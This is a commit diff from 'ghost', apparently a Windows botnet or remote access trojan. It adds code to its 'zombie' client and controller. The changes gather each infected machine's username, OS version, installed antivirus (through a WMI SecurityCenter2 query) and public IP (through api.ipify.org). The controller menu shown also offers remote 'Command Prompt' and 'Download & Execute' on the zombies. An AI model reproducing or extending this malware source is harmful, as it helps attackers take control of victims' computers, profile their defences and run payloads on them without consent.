1.0.2

1.0.2 (12/12/2017)

- Fixed repeated commands
- Windows version now shown
- Username of client now shown
- Antivirus shown

CHANGELOG.md

@@ -1,3 +1,10 @@
+1.0.2 (12/12/2017)
+
+- Fixed repeated commands
+- Windows version now shown
+- Username of client now shown
+- Antivirus shown 
+
 1.0.1 (12/12/2017)
 
 - Fixed incorrect CHANGELOG.md

_src/server/server.cpp

@@ -20,7 +20,7 @@
 	along with ghost.  If not, see <http://www.gnu.org/licenses/>.
 */
 //=======================================================
-#define					DEFAULT_BUFF	9056
+#define					DEFAULT_BUFF	19056
 #define					AHXRLOGGER_PLUGIN // https://github.com/AHXR/ahxrlogger
 
 #define					SHOW_CONSOLE()		{ AllocConsole(); LOG("%s\n\n", c_ascii); b_hidden = false; }
@@ -71,6 +71,7 @@ AHXRSERVER				a_server;
 #pragma comment			(lib, "Wininet.lib")
 #pragma comment			(lib, "user32.lib")
 
+void getAntivirus();
 
 int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR pScmdline, int iCmdshow) 
 {
@@ -83,6 +84,7 @@ int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR pScmdline,
     return 0;
 }
 
+
 void refreshClients() {
 	ghostlib::_clientData	client_data;
 	int i_res;
@@ -205,7 +207,7 @@ DWORD WINAPI t_gui(LPVOID params) {
 						client_data		= ghostlib::getZombieData(i); // Returning a reference to the struct
 
 						j_data			= json::parse(client_data.system_data);
-						s_output		= j_data["ID"].get<std::string>() + std::string(" - ") + j_data["IP"].get<std::string>() + std::string(":" + j_data["PORT"].get<std::string>());
+						s_output = j_data["ID"].get<std::string>() + std::string(" - ") + j_data["IP"].get<std::string>() + std::string(":" + j_data["PORT"].get<std::string>() + " ");
 
 						sys_data		= gcnew String(s_output.c_str());
 						LOG("%i) %s", i + 1, s_output.c_str());
@@ -223,7 +225,13 @@ DWORD WINAPI t_gui(LPVOID params) {
 							client_data = ghostlib::getZombieData(i_option - 1);
 							j_data		= json::parse(client_data.system_data);
 
-							LOG("\n\nYou have selected \"%s\" (%s:%s)", j_data["ID"].get<std::string>().c_str(), j_data["IP"].get<std::string>().c_str(), j_data["PORT"].get<std::string>().c_str());
+							SHOW_GHOST();
+							LOG("----------------------------------");
+							LOG("[COLOR:YELLOW]You have selected \"%s\" (%s:%s)", j_data["ID"].get<std::string>().c_str(), j_data["IP"].get<std::string>().c_str(), j_data["PORT"].get<std::string>().c_str());
+							LOG("[COLOR:CYAN][Username]: %s", j_data["USER"].get<std::string>().c_str());
+							LOG("[COLOR:LIGHTGREEN][Operating System]: %s", j_data["OS"].get<std::string>().c_str());
+							LOG("[COLOR:RED][Antivirus]: %s", j_data["AV"].get<std::string>().c_str());
+							LOG("----------------------------------");
 							GO_BACK();
 							LOG("1) Command Prompt\n2) Download & Execute");
 
@@ -410,7 +418,7 @@ void onServerClientConnect(SOCKET clientSocket, CLIENTDATA info) {
 
 void onServerRecData(SOCKET clientSocket, CLIENTDATA info, char * data) {
 	string s_data = data;
-
+	
 	if (b_waiting) {
 		LOG("[RESPONSE]\n%s", data);
 
@@ -421,10 +429,14 @@ void onServerRecData(SOCKET clientSocket, CLIENTDATA info, char * data) {
 	}
 	else {
 		int	i_zombie_idx;
+		char * new_data = new char[strlen(data) + 1];
 
 		ghostlib::addZombie(ghostlib::_clientData{ clientSocket, info });
 		i_zombie_idx = ghostlib::getZombieIndex(clientSocket);
-		ghostlib::parseZombie(clientSocket, i_zombie_idx, data);
+
+		strcpy(new_data, data);
+
+		ghostlib::parseZombie(clientSocket, i_zombie_idx, new_data);
 	}
 }
 

_src/zombie/info.cpp

@@ -0,0 +1,144 @@
+/*
+	@title
+		ghost
+	@author
+		AHXR (https://github.com/AHXR)
+	@copyright
+		2017
+
+	ghost is free software: you can redistribute it and/or modify
+	it under the terms of the GNU General Public License as published by
+	the Free Software Foundation, either version 3 of the License, or
+	(at your option) any later version.
+
+	ghost is distributed in the hope that it will be useful,
+	but WITHOUT ANY WARRANTY; without even the implied warranty of
+	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+	GNU General Public License for more details.
+
+	You should have received a copy of the GNU General Public License
+	along with ghost.  If not, see <http://www.gnu.org/licenses/>.
+*/
+//=======================================================
+#include					<string>
+#include					<Windows.h>
+#include					<wbemidl.h>
+#include					<iostream>
+#include					<conio.h>
+#include					<comdef.h>
+#include					<wininet.h>
+#include					"info.h"
+
+#pragma comment				(lib, "wbemuuid.lib")
+
+using namespace				std;
+string						BstrToStdString(BSTR bstr, int cp = CP_UTF8);
+
+/*
+	http://www.rohitab.com/discuss/topic/42792-wmi-get-antivirus-name-c/?p=10106373
+*/
+string getAntivirus() {
+	CoInitializeEx(0, 0);
+	CoInitializeSecurity(0, -1, 0, 0, 0, 3, 0, 0, 0);
+	IWbemLocator *locator = 0;
+	CoCreateInstance(CLSID_WbemLocator, 0, CLSCTX_INPROC_SERVER, IID_IWbemLocator, (void **)&locator);
+	IWbemServices * services = 0;
+	wchar_t *name = L"root\\SecurityCenter2";
+	if (SUCCEEDED(locator->ConnectServer(name, 0, 0, 0, 0, 0, 0, &services))) {
+		printf("Connected!\n");
+		//Lets get system information
+		CoSetProxyBlanket(services, 10, 0, 0, 3, 3, 0, 0);
+		wchar_t *query = L"Select * From AntiVirusProduct";
+		IEnumWbemClassObject *e = 0;
+		if (SUCCEEDED(services->ExecQuery(L"WQL", query, WBEM_FLAG_FORWARD_ONLY, 0, &e))) {
+			printf("Query executed successfuly!\n");
+			IWbemClassObject *object = 0;
+			ULONG u = 0;
+			//lets enumerate all data from this table
+
+			std::string antiVirus;
+
+			while (e) {
+				e->Next(WBEM_INFINITE, 1, &object, &u);
+				if (!u) break;//no more data,end enumeration
+				VARIANT cvtVersion;
+				object->Get(L"displayName", 0, &cvtVersion, 0, 0);
+
+				services->Release();
+				locator->Release();
+				CoUninitialize();
+				_getch();
+
+				return BstrToStdString(cvtVersion.bstrVal);
+			}
+		}
+		else
+			printf("Error executing query!\n");
+	}
+	else
+		printf("Connection error!\n");
+
+	services->Release();
+	locator->Release();
+	CoUninitialize();
+	_getch();
+
+	return string("No Antivirus Detected");
+}
+
+std::string& BstrToStdString(const BSTR bstr, std::string& dst, int cp = CP_UTF8)
+{
+	if (!bstr)
+	{
+		// define NULL functionality. I just clear the target.
+		dst.clear();
+		return dst;
+	}
+
+	// request content length in single-chars through a terminating
+	//  nullchar in the BSTR. note: BSTR's support imbedded nullchars,
+	//  so this will only convert through the first nullchar.
+	int res = WideCharToMultiByte(cp, 0, bstr, -1, NULL, 0, NULL, NULL);
+	if (res > 0)
+	{
+		dst.resize(res);
+		WideCharToMultiByte(cp, 0, bstr, -1, &dst[0], res, NULL, NULL);
+	}
+	else
+	{    // no content. clear target
+		dst.clear();
+	}
+	return dst;
+}
+
+// conversion with temp.
+std::string BstrToStdString(BSTR bstr, int cp)
+{
+	std::string str;
+	BstrToStdString(bstr, str, cp);
+	return str;
+}
+
+std::string real_ip() {
+
+	HINTERNET net = InternetOpen("--",
+		INTERNET_OPEN_TYPE_PRECONFIG,
+		NULL,
+		NULL,
+		0);
+
+	HINTERNET conn = InternetOpenUrl(net,
+		"https://api.ipify.org/",
+		NULL,
+		0,
+		INTERNET_FLAG_RELOAD,
+		0);
+
+	char buffer[4096];
+	DWORD read;
+
+	InternetReadFile(conn, buffer, sizeof(buffer) / sizeof(buffer[0]), &read);
+	InternetCloseHandle(net);
+
+	return std::string(buffer, read);
+}

_src/zombie/info.h

@@ -0,0 +1,24 @@
+/*
+	@title
+		ghost
+	@author
+		AHXR (https://github.com/AHXR)
+	@copyright
+		2017
+
+	ghost is free software: you can redistribute it and/or modify
+	it under the terms of the GNU General Public License as published by
+	the Free Software Foundation, either version 3 of the License, or
+	(at your option) any later version.
+
+	ghost is distributed in the hope that it will be useful,
+	but WITHOUT ANY WARRANTY; without even the implied warranty of
+	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+	GNU General Public License for more details.
+
+	You should have received a copy of the GNU General Public License
+	along with ghost.  If not, see <http://www.gnu.org/licenses/>.
+*/
+//=======================================================
+std::string					getAntivirus();
+std::string					real_ip();